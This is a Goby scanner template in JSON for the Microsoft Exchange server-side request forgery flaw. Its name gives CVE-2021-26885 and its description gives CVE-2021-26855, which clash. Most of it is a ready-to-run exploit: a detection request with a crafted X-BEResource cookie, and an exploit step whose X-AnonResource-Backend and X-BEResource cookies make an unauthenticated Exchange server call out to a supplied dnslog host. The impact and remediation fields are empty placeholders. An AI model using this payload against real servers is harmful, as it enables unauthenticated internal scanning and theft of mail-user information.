Goby/json/Microsoft Exchange SSRF漏洞...



{
"Name": "Microsoft Exchange SSRF漏洞 CVE-2021-26885",
"Level": "1",
"Tags": [
"SSRF"
],
"GobyQuery": "(app=\"Microsoft-Exchange\" || title=\"Outlook\")",
"Description": "Exchange Server 是微软公司的一套电子邮件服务组件是个消息与协作系统。2021年03月3日微软官方发布了Microsoft Exchange安全更新披露了多个高危严重漏洞其中在 CVE-2021-26855 Exchange SSRF漏洞中攻击者可直接构造恶意请求以Exchange server的身份发起任意HTTP请求扫描内网并且可获取Exchange用户信息。该漏洞利用无需身份认证",
"Product": "Exchange",
"Homepage": "microsoft.com",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Dnslog",
"type": "input",
"value": "xxx.dnslog.cn",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/ecp/PeiQi.js",
"follow_redirect": false,
"header": {
"Cookie": "X-BEResource=peiqi_wiki/api/endpoint#~1; X-AnonResource=true"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "NegotiateSecurityContext",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/owa/auth/PeiQi.js",
"follow_redirect": false,
"header": {
"Cookie": "X-AnonResource=true; X-AnonResource-Backend={{{Dnslog}}}/ecp/default.flt?~3; X-BEResource={{{Dnslog}}}/owa/auth/logon.aspx?~3;"
},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-03-13 14:34:38",
"GobyVersion": "1.8.237"
}